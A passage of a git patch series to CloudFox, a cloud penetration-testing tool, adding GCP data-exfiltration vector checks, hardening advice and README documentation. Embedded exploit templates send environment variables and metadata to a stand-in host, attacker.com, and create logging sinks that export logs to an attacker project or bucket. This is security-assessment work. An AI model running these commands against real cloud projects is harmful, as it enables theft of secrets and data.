res) => { +# const data = JSON.stringify({secrets: process.env}); +# const options = {hostname: 'attacker.com', path: '/collect', method: 'POST'}; +# https.request(options).write(data); +# res.send('ok'); +# }; + +# Invoke a function (if publicly accessible or you have invoker role) +gcloud functions call FUNCTION_NAME --project=%s + +# View function source +gcloud functions describe FUNCTION_NAME --project=%s`, projectID, projectID, projectID), + } + + m.mu.Lock() + m.PotentialVectors = append(m.PotentialVectors, vector) + m.addPotentialVectorToLoot(vector) + m.mu.Unlock() + } +} + +// checkCloudRunCapability checks if Cloud Run services exist +func (m *DataExfiltrationModule) checkCloudRunCapability(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + return // Silently skip + } + + if len(resp.Items) > 0 { + vector := PotentialVector{ + VectorType: "Cloud Run", + ResourceName: "*", + ProjectID: projectID, + Description: "Cloud Run services can make outbound HTTP requests to external endpoints", + Destination: "External HTTP endpoint", + ExploitCommand: fmt.Sprintf(`# List all Cloud Run services +gcloud run services list --project=%s + +# If you can update service, add exfiltration logic in container +# Cloud Run containers have full network egress by default + +# Example: Deploy container that exfiltrates environment/metadata +# Dockerfile: +# FROM python:3.9-slim +# COPY exfil.py . +# CMD ["python", "exfil.py"] + +# exfil.py: +# import os, requests +# requests.post('https://attacker.com/collect', json={ +# 'env': dict(os.environ), +# 'metadata': requests.get('http://metadata.google.internal/...').text +# }) + +# View service details +gcloud run services describe SERVICE_NAME --region=REGION --project=%s + +# Invoke service (if you have invoker role) +curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" SERVICE_URL`, projectID, projectID), + } + + m.mu.Lock() + m.PotentialVectors = append(m.PotentialVectors, vector) + m.addPotentialVectorToLoot(vector) + m.mu.Unlock() + } +} + +// checkLoggingSinkCapability checks if logging sinks can be created +func (m *DataExfiltrationModule) checkLoggingSinkCapability(ctx context.Context, projectID string, logger internal.Logger) { + ls := loggingservice.New() + sinks, err := ls.Sinks(projectID) + if err != nil { + return // Silently skip + } + + // If we can list sinks, we might be able to create them + // Also check if there's an existing sink we could modify + hasCrossProjectSink := false + for _, sink := range sinks { + if sink.IsCrossProject { + hasCrossProjectSink = true + break + } + } + + // Add as potential vector if logging API is accessible + vector := PotentialVector{ + VectorType: "Logging Sink", + ResourceName: "*", + ProjectID: projectID, + Description: "Logs can be exported to external project or Pub/Sub topic", + Destination: "External project or Pub/Sub topic", + ExploitCommand: fmt.Sprintf(`# List existing logging sinks +gcloud logging sinks list --project=%s + +# Create a sink to export logs to attacker-controlled destination +# (requires logging.sinks.create permission) + +# Export to Pub/Sub topic in another project +gcloud logging sinks create exfil-sink \ + pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/stolen-logs \ + --log-filter='resource.type="gce_instance"' \ + --project=%s + +# Export to BigQuery in another project +gcloud logging sinks create exfil-sink \ + bigquery.googleapis.com/projects/ATTACKER_PROJECT/datasets/stolen_logs \ + --log-filter='resource.type="gce_instance"' \ + --project=%s + +# Export to GCS bucket +gcloud logging sinks create exfil-sink \ + storage.googleapis.com/attacker-bucket \ + --log-filter='resource.type="gce_instance"' \ + --project=%s + +# Modify existing sink destination (requires logging.sinks.update) +gcloud logging sinks update SINK_NAME \ + --destination=pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/stolen \ + --project=%s`, projectID, projectID, projectID, projectID, projectID), + } + + // Only add if there's evidence logging is actively used or we found sinks + if len(sinks) > 0 || hasCrossProjectSink { + m.mu.Lock() + m.PotentialVectors = append(m.PotentialVectors, vector) + m.addPotentialVectorToLoot(vector) + m.mu.Unlock() + } +} + // ------------------------------ // Loot File Management // ------------------------------ @@ -865,20 +1397,18 @@ func (m *DataExfiltrationModule) initializeLootFiles() { } } -// formatExfilType converts internal type names to user-friendly display names -func formatExfilType(pathType string) string { - return pathType // Already formatted in the new module -} - func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { if path.ExploitCommand == "" { return } m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( - "## %s: %s (Project: %s)\n"+ - "# %s\n"+ - "# Destination: %s\n", + "#############################################\n"+ + "## [ACTUAL] %s: %s\n"+ + "## Project: %s\n"+ + "## Description: %s\n"+ + "## Destination: %s\n"+ + "#############################################\n", path.PathType, path.ResourceName, path.ProjectID, @@ -889,45 +1419,88 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } +func (m *DataExfiltrationModule) addPotentialVectorToLoot(vector PotentialVector) { + if vector.ExploitCommand == "" { + return + } + + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + "#############################################\n"+ + "## [POTENTIAL] %s\n"+ + "## Project: %s\n"+ + "## Description: %s\n"+ + "## Destination: %s\n"+ + "#############################################\n", + vector.VectorType, + vector.ProjectID, + vector.Description, + vector.Destination, + ) + + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", vector.ExploitCommand) +} + +func (m *DataExfiltrationModule) addHardeningRecommendationsToLoot(recommendations []MissingHardening) { + if len(recommendations) == 0 { + return + } + + // Initialize hardening loot file if not exists + if _, ok := m.LootMap["data-exfiltration-hardening"]; !ok { + m.LootMap["data-exfiltration-hardening"] = &internal.LootFile{ + Name: "data-exfiltration-hardening", + Contents: "# Data Exfiltration Prevention - Hardening Recommendations\n# Generated by CloudFox\n# These controls help prevent data exfiltration from GCP projects\n\n", + } + } + + // Group recommendations by project + projectRecs := make(map[string][]MissingHardening) + for _, rec := range recommendations { + projectRecs[rec.ProjectID] = append(projectRecs[rec.ProjectID], rec) + } + + for projectID, recs := range projectRecs { + m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf( + "#############################################\n"+ + "## PROJECT: %s (%s)\n"+ + "## Missing %d security control(s)\n"+ + "#############################################\n\n", + projectID, + m.GetProjectName(projectID), + len(recs), + ) + + for _, rec := range recs { + m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Description: %s\n"+ + "#############################################\n", + rec.Category, + rec.Control, + rec.Description, + ) + m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf("%s\n\n", rec.Recommendation) + } + } +} + // ------------------------------ // Output Generation // ------------------------------ -// getExfilDescription returns a user-friendly description of the exfiltration path type -func getExfilDescription(pathType string) string { - descriptions := map[string]string{ - "Public Snapshot": "Disk snapshot can be copied to create new disks externally", - "Public Image": "VM image can be used to launch instances externally", - "Public Bucket": "GCS bucket contents can be downloaded by anyone", - "Logging Sink": "Logs can be exported to a cross-project destination", - "Pub/Sub Push": "Messages can be pushed to an external HTTP endpoint", - "Pub/Sub BigQuery Export": "Messages can be exported to BigQuery in another project", - "Pub/Sub GCS Export": "Messages can be exported to a Cloud Storage bucket", - "Public BigQuery": "BigQuery dataset can be queried and exported by anyone", - "Cloud SQL Export": "Cloud SQL data can be exported via CDC or backup", - "Storage Transfer": "Data can be transferred to external cloud providers", - } - - if desc, ok := descriptions[pathType]; ok { - return desc - } - return "Data can be exfiltrated via this path" -} - func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + // Table 1: Actual Misconfigurations + misconfigHeader := []string{ "Project ID", "Project Name", "Resource", "Type", "Destination", "Public", - "VPC-SC Protected", - "Org Policy Protected", - "Description", + "Size", } - var body [][]string + var misconfigBody [][]string // Track which resources we've added from PublicExports publicResources := make(map[string]PublicExport) @@ -936,69 +1509,91 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna publicResources[key] = e } - // Add exfiltration paths + // Add exfiltration paths (actual misconfigurations) for _, p := range m.ExfiltrationPaths { key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) - _, isPublic := publicResources[key] + export, isPublic := publicResources[key] publicStatus := "No" + size := "-" if isPublic { publicStatus = "Yes" + size = export.Size delete(publicResources, key) } - // Check VPC-SC protection - vpcscProtected := "No" - if m.vpcscProtectedProj[p.ProjectID] || p.VPCSCProtected { - vpcscProtected = "Yes" - } - - // Check org policy protection - orgPolicyProtected := "No" - if m.isOrgPolicyProtected(p.ProjectID) { - orgPolicyProtected = "Yes" - } - - body = append(body, []string{ + misconfigBody = append(misconfigBody, []string{ p.ProjectID, m.GetProjectName(p.ProjectID), p.ResourceName, p.PathType, p.Destination, publicStatus, - vpcscProtected, - orgPolicyProtected, - getExfilDescription(p.PathType), + size, }) } // Add any remaining public exports not already covered for _, e := range publicResources { - // Check VPC-SC protection - vpcscProtected := "No" - if m.vpcscProtectedProj[e.ProjectID] { - vpcscProtected = "Yes" - } - - // Check org policy protection - orgPolicyProtected := "No" - if m.isOrgPolicyProtected(e.ProjectID) { - orgPolicyProtected = "Yes" - } - - body = append(body, []string{ + misconfigBody = append(misconfigBody, []string{ e.ProjectID, m.GetProjectName(e.ProjectID), e.ResourceName, e.ResourceType, - "Public access", + "Public access: " + e.AccessLevel, "Yes", - vpcscProtected, - orgPolicyProtected, - getExfilDescription(e.ResourceType), + e.Size, + }) + } + + // Table 2: Potential Exfiltration Vectors + vectorHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Destination", + "Public", + "Size", + } + + var vectorBody [][]string + for _, v := range m.PotentialVectors { + vectorBody = append(vectorBody, []string{ + v.ProjectID, + m.GetProjectName(v.ProjectID), + v.ResourceName, + v.VectorType, + v.Destination, + "No", + "-", + }) + } + + // Table 3: Missing Hardening Recommendations + hardeningHeader := []string{ + "Project ID", + "Project Name", + "Category", + "Control", + "Description", + } + + var hardeningBody [][]string + hardeningRecs := m.generateMissingHardeningRecommendations() + for _, h := range hardeningRecs { + hardeningBody = append(hardeningBody, []string{ + h.ProjectID, + m.GetProjectName(h.ProjectID), + h.Category, + h.Control, + h.Description, }) } + // Add hardening recommendations to loot file + m.addHardeningRecommendationsToLoot(hardeningRecs) + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -1010,11 +1605,27 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna // Build tables tables := []internal.TableFile{} - if len(body) > 0 { + if len(misconfigBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration-misconfigurations", + Header: misconfigHeader, + Body: misconfigBody, + }) + } + + if len(vectorBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration-vectors", + Header: vectorHeader, + Body: vectorBody, + }) + } + + if len(hardeningBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "data-exfiltration", - Header: header, - Body: body, + Name: "data-exfiltration-hardening", + Header: hardeningHeader, + Body: hardeningBody, }) } From 06a9dabf48c192306a1701cb7e65b2eca49edfb9 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 14 Jan 2026 14:51:54 -0500 Subject: [PATCH 14/48] refactored output to be hierarchical, added privesc checks --- README.md | 166 ++-- cli/gcp.go | 202 ++++- gcp/commands/accesslevels.go | 243 ++++-- gcp/commands/appengine.go | 254 ++++-- gcp/commands/artifact-registry.go | 308 +++++-- gcp/commands/assetinventory.go | 578 ++++++++----- gcp/commands/backupinventory.go | 504 +++++++----- gcp/commands/beyondcorp.go | 334 +++++--- gcp/commands/bigquery.go | 277 +++++-- gcp/commands/bigtable.go | 216 +++-- gcp/commands/bucketenum.go | 254 +++--- gcp/commands/buckets.go | 255 ++++-- gcp/commands/certmanager.go | 266 ++++-- gcp/commands/cloudarmor.go | 286 ++++--- gcp/commands/cloudbuild.go | 286 +++++-- gcp/commands/cloudrun.go | 505 +++++++----- gcp/commands/cloudsql.go | 238 ++++-- gcp/commands/compliancedashboard.go | 189 ++++- gcp/commands/composer.go | 140 +++- gcp/commands/costsecurity.go | 185 ++++- gcp/commands/crossproject.go | 65 +- gcp/commands/dataexfiltration.go | 461 +++++++---- gcp/commands/dataflow.go | 130 ++- gcp/commands/dataproc.go | 144 +++- gcp/commands/dns.go | 310 ++++--- gcp/commands/domainwidedelegation.go | 149 +++- gcp/commands/endpoints.go | 215 +++-- gcp/commands/filestore.go | 158 +++- gcp/commands/firewall.go | 337 +++++--- gcp/commands/functions.go | 311 ++++--- gcp/commands/gke.go | 331 +++++--- gcp/commands/iam.go | 255 +++++- gcp/commands/iap.go | 140 +++- gcp/commands/instances.go | 384 ++++++--- gcp/commands/keys.go | 209 +++-- gcp/commands/kms.go | 267 ++++-- gcp/commands/lateralmovement.go | 254 ++++-- gcp/commands/loadbalancers.go | 343 +++++--- gcp/commands/logging.go | 357 ++++++--- gcp/commands/logginggaps.go | 153 +++- gcp/commands/memorystore.go | 123 ++- gcp/commands/monitoringalerts.go | 404 +++++++--- gcp/commands/networktopology.go | 611 +++++++++----- gcp/commands/notebooks.go | 401 +++++++--- gcp/commands/organizations.go | 93 ++- gcp/commands/orgpolicies.go | 146 +++- gcp/commands/permissions.go | 390 ++++++--- gcp/commands/privateserviceconnect.go | 416 +++++----- gcp/commands/privesc.go | 268 +++++-- gcp/commands/publicaccess.go | 186 ++++- gcp/commands/pubsub.go | 366 +++++---- gcp/commands/resourceiam.go | 225 +++++- gcp/commands/scheduler.go | 170 +++- gcp/commands/secrets.go | 253 ++++-- gcp/commands/securitycenter.go | 248 ++++-- gcp/commands/serviceaccounts.go | 317 ++++---- gcp/commands/serviceagents.go | 197 +++-- gcp/commands/sourcerepos.go | 234 ++++-- gcp/commands/spanner.go | 251 ++++-- gcp/commands/vpcnetworks.go | 452 +++++++---- gcp/commands/vpcsc.go | 57 ++ gcp/commands/whoami.go | 60 +- gcp/commands/workloadidentity.go | 381 ++++++--- gcp/services/iamService/iamService.go | 77 +- .../organizationsService.go | 82 +- gcp/services/privescService/privescService.go | 757 ++++++++++++++++-- internal/gcp/base.go | 41 + internal/gcp/hierarchy.go | 463 +++++++++++ internal/gcp/privesc_cache.go | 241 ++++++ internal/output2.go | 293 +++++++ 70 files changed, 13786 insertions(+), 5076 deletions(-) create mode 100644 internal/gcp/hierarchy.go create mode 100644 internal/gcp/privesc_cache.go diff --git a/README.md b/README.md index 62f74138..7cea461f 100644 --- a/README.md +++ b/README.md @@ -106,7 +106,55 @@ Additional policy notes (as of 09/2022): | `arn:aws:iam::aws:policy/AdministratorAccess` | This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :) | ### Azure -* Viewer or similar permissions applied. +* Viewer or similar permissions applied. + +### GCP +* Google Cloud SDK installed and authenticated +* Application Default Credentials configured (`gcloud auth application-default login`) +* Recommended permissions at appropriate hierarchy levels (see below) + +#### GCP Permissions: Minimal vs Comprehensive + +**Minimal Permissions (Single Project):** + +For basic enumeration of a single project, the `roles/viewer` role provides read access to most resources. + +**Comprehensive Permissions (Organization-Wide):** + +For thorough security assessments across an entire organization: + +| Scope | Role | Purpose | +| - | - | - | +| **Organization** | `roles/resourcemanager.organizationViewer` | View organization structure and metadata | +| **Organization** | `roles/iam.securityReviewer` | Review IAM policies across the organization | +| **Organization** | `roles/cloudasset.viewer` | Query Cloud Asset Inventory for all resources | +| **Organization** | `roles/cloudidentity.groupsViewer` | Enumerate Google Groups and memberships | +| **Folder** | `roles/resourcemanager.folderViewer` | View folder hierarchy and metadata | +| **Project** | `roles/viewer` | Read access to most project resources | +| **Project** | `roles/monitoring.viewer` | View monitoring metrics and dashboards | +| **Project** | `roles/logging.viewer` | Read audit logs and log-based metrics | +| **Project** | `roles/compute.networkViewer` | View network configurations, firewall rules, VPCs | +| **Project** | `roles/serviceusage.viewer` | View enabled APIs and service configurations | +| **Tooling Project** | `roles/serviceusage.serviceUsageAdmin` | (Optional) Manage API quotas for CloudFox operations | + +#### GCP API Requirements + +**APIs must be enabled in each project you want to assess.** GCP APIs are project-scoped. + +| API | Service Name | Purpose | +| - | - | - | +| Cloud Identity API | `cloudidentity.googleapis.com` | Group enumeration, inherited role analysis | +| Cloud Asset API | `cloudasset.googleapis.com` | Cross-project resource discovery | +| Cloud Resource Manager API | `cloudresourcemanager.googleapis.com` | Organization mapping, IAM enumeration | +| IAM API | `iam.googleapis.com` | IAM analysis, privilege escalation detection | +| Compute Engine API | `compute.googleapis.com` | Instance enumeration, network security | +| Secret Manager API | `secretmanager.googleapis.com` | Secrets enumeration | +| Cloud Functions API | `cloudfunctions.googleapis.com` | Serverless enumeration | +| Cloud Run API | `run.googleapis.com` | Serverless enumeration | +| Kubernetes Engine API | `container.googleapis.com` | Container security analysis | +| BigQuery API | `bigquery.googleapis.com` | Data security analysis | + +For detailed setup instructions, see the [GCP Setup Guide](https://github.com/BishopFox/cloudfox/wiki/GCP-Setup-Guide). # AWS Commands | Provider | Command Name | Description @@ -160,102 +208,104 @@ Additional policy notes (as of 09/2022): # GCP Commands +For detailed documentation on each GCP command, see the [GCP Commands Wiki](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands). + ## Identity & Access Management | Provider | Command Name | Description | | - | - | - | -| GCP | whoami | Display identity context for the authenticated GCP user/service account | -| GCP | iam | Enumerate GCP IAM principals across organizations, folders, and projects | -| GCP | permissions | Enumerate ALL permissions for each IAM entity with full inheritance explosion | -| GCP | serviceaccounts | Enumerate GCP service accounts with security analysis | -| GCP | service-agents | Enumerate Google-managed service agents | -| GCP | keys | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | -| GCP | resource-iam | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | -| GCP | domain-wide-delegation | Find service accounts with Domain-Wide Delegation to Google Workspace | -| GCP | privesc | Identify privilege escalation paths in GCP projects | +| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display identity context for the authenticated GCP user/service account | +| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | [permissions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#permissions) | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | [serviceaccounts](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#serviceaccounts) | Enumerate GCP service accounts with security analysis | +| GCP | [service-agents](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#service-agents) | Enumerate Google-managed service agents | +| GCP | [keys](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#keys) | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | +| GCP | [resource-iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#resource-iam) | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | +| GCP | [domain-wide-delegation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#domain-wide-delegation) | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths in GCP projects | ## Compute & Containers | Provider | Command Name | Description | | - | - | - | -| GCP | instances | Enumerate GCP Compute Engine instances with security configuration | -| GCP | gke | Enumerate GKE clusters with security analysis | -| GCP | cloudrun | Enumerate Cloud Run services and jobs with security analysis | -| GCP | functions | Enumerate GCP Cloud Functions with security analysis | -| GCP | app-engine | Enumerate App Engine applications and security configurations | -| GCP | composer | Enumerate Cloud Composer environments | -| GCP | dataproc | Enumerate Dataproc clusters | -| GCP | dataflow | Enumerate Dataflow jobs and pipelines | -| GCP | notebooks | Enumerate Vertex AI Workbench notebooks | -| GCP | workload-identity | Enumerate GKE Workload Identity and Workload Identity Federation | +| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Enumerate GCP Compute Engine instances with security configuration | +| GCP | [gke](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#gke) | Enumerate GKE clusters with security analysis | +| GCP | [cloudrun](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudrun) | Enumerate Cloud Run services and jobs with security analysis | +| GCP | [functions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#functions) | Enumerate GCP Cloud Functions with security analysis | +| GCP | [app-engine](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#app-engine) | Enumerate App Engine applications and security configurations | +| GCP | [composer](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#composer) | Enumerate Cloud Composer environments | +| GCP | [dataproc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataproc) | Enumerate Dataproc clusters | +| GCP | [dataflow](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataflow) | Enumerate Dataflow jobs and pipelines | +| GCP | [notebooks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#notebooks) | Enumerate Vertex AI Workbench notebooks | +| GCP | [workload-identity](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#workload-identity) | Enumerate GKE Workload Identity and Workload Identity Federation | ## Storage & Databases | Provider | Command Name | Description | | - | - | - | -| GCP | buckets | Enumerate GCP Cloud Storage buckets with security configuration | -| GCP | bucket-enum | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | -| GCP | bigquery | Enumerate GCP BigQuery datasets and tables with security analysis | -| GCP | cloudsql | Enumerate Cloud SQL instances with security analysis | -| GCP | spanner | Enumerate Cloud Spanner instances and databases | -| GCP | bigtable | Enumerate Cloud Bigtable instances and tables | -| GCP | filestore | Enumerate Filestore NFS instances | -| GCP | memorystore | Enumerate Memorystore (Redis) instances | +| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | [bucket-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bucket-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | [cloudsql](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudsql) | Enumerate Cloud SQL instances with security analysis | +| GCP | [spanner](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner) | Enumerate Cloud Spanner instances and databases | +| GCP | [bigtable](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable) | Enumerate Cloud Bigtable instances and tables | +| GCP | [filestore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#filestore) | Enumerate Filestore NFS instances | +| GCP | [memorystore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#memorystore) | Enumerate Memorystore (Redis) instances | ## Networking | Provider | Command Name | Description | | - | - | - | -| GCP | vpc-networks | Enumerate VPC Networks | -| GCP | firewall | Enumerate VPC networks and firewall rules with security analysis | -| GCP | loadbalancers | Enumerate Load Balancers | -| GCP | dns | Enumerate Cloud DNS zones and records with security analysis | -| GCP | endpoints | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | -| GCP | private-service-connect | Enumerate Private Service Connect endpoints and service attachments | -| GCP | network-topology | Visualize VPC network topology, peering relationships, and trust boundaries | +| GCP | [vpc-networks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-networks) | Enumerate VPC Networks | +| GCP | [firewall](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#firewall) | Enumerate VPC networks and firewall rules with security analysis | +| GCP | [loadbalancers](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#loadbalancers) | Enumerate Load Balancers | +| GCP | [dns](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dns) | Enumerate Cloud DNS zones and records with security analysis | +| GCP | [endpoints](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#endpoints) | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | [private-service-connect](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#private-service-connect) | Enumerate Private Service Connect endpoints and service attachments | +| GCP | [network-topology](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#network-topology) | Visualize VPC network topology, peering relationships, and trust boundaries | ## Security & Compliance | Provider | Command Name | Description | | - | - | - | -| GCP | vpc-sc | Enumerate VPC Service Controls | -| GCP | access-levels | Enumerate Access Context Manager access levels | -| GCP | cloud-armor | Enumerate Cloud Armor security policies and find weaknesses | -| GCP | iap | Enumerate Identity-Aware Proxy configurations | -| GCP | beyondcorp | Enumerate BeyondCorp Enterprise configurations | -| GCP | kms | Enumerate Cloud KMS key rings and crypto keys with security analysis | -| GCP | secrets | Enumerate GCP Secret Manager secrets with security configuration | -| GCP | cert-manager | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | -| GCP | org-policies | Enumerate organization policies and identify security weaknesses | +| GCP | [vpc-sc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-sc) | Enumerate VPC Service Controls | +| GCP | [access-levels](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#access-levels) | Enumerate Access Context Manager access levels | +| GCP | [cloud-armor](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloud-armor) | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | [iap](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iap) | Enumerate Identity-Aware Proxy configurations | +| GCP | [beyondcorp](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#beyondcorp) | Enumerate BeyondCorp Enterprise configurations | +| GCP | [kms](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#kms) | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | [cert-manager](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cert-manager) | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | [org-policies](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#org-policies) | Enumerate organization policies and identify security weaknesses | ## CI/CD & Source Control | Provider | Command Name | Description | | - | - | - | -| GCP | artifact-registry | Enumerate GCP Artifact Registry and Container Registry with security configuration | -| GCP | cloudbuild | Enumerate Cloud Build triggers and builds | -| GCP | source-repos | Enumerate Cloud Source Repositories | -| GCP | scheduler | Enumerate Cloud Scheduler jobs with security analysis | +| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | [cloudbuild](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudbuild) | Enumerate Cloud Build triggers and builds | +| GCP | [source-repos](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#source-repos) | Enumerate Cloud Source Repositories | +| GCP | [scheduler](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#scheduler) | Enumerate Cloud Scheduler jobs with security analysis | ## Messaging & Events | Provider | Command Name | Description | | - | - | - | -| GCP | pubsub | Enumerate Pub/Sub topics and subscriptions with security analysis | +| GCP | [pubsub](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#pubsub) | Enumerate Pub/Sub topics and subscriptions with security analysis | ## Logging & Monitoring | Provider | Command Name | Description | | - | - | - | -| GCP | logging | Enumerate Cloud Logging sinks and metrics with security analysis | -| GCP | logging-gaps | Find resources with missing or incomplete logging | +| GCP | [logging](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging) | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | [logging-gaps](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging-gaps) | Find resources with missing or incomplete logging | ## Organization & Projects | Provider | Command Name | Description | | - | - | - | -| GCP | organizations | Enumerate GCP organization hierarchy | -| GCP | asset-inventory | Enumerate Cloud Asset Inventory with optional dependency analysis | -| GCP | backup-inventory | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | [organizations](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#organizations) | Enumerate GCP organization hierarchy | +| GCP | [asset-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#asset-inventory) | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | [backup-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#backup-inventory) | Enumerate backup policies, protected resources, and identify backup gaps | ## Attack Path Analysis | Provider | Command Name | Description | | - | - | - | -| GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | -| GCP | data-exfiltration | Identify data exfiltration paths, potential vectors, and missing security hardening | -| GCP | public-access | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | -| GCP | cross-project | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | +| GCP | [lateral-movement](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#lateral-movement) | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | [data-exfiltration](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#data-exfiltration) | Identify data exfiltration paths, potential vectors, and missing security hardening | +| GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | +| GCP | [cross-project](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cross-project) | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | diff --git a/cli/gcp.go b/cli/gcp.go index 7f770a8d..fee8d8d8 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -3,11 +3,15 @@ package cli import ( "context" "fmt" + "strings" + "time" "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" 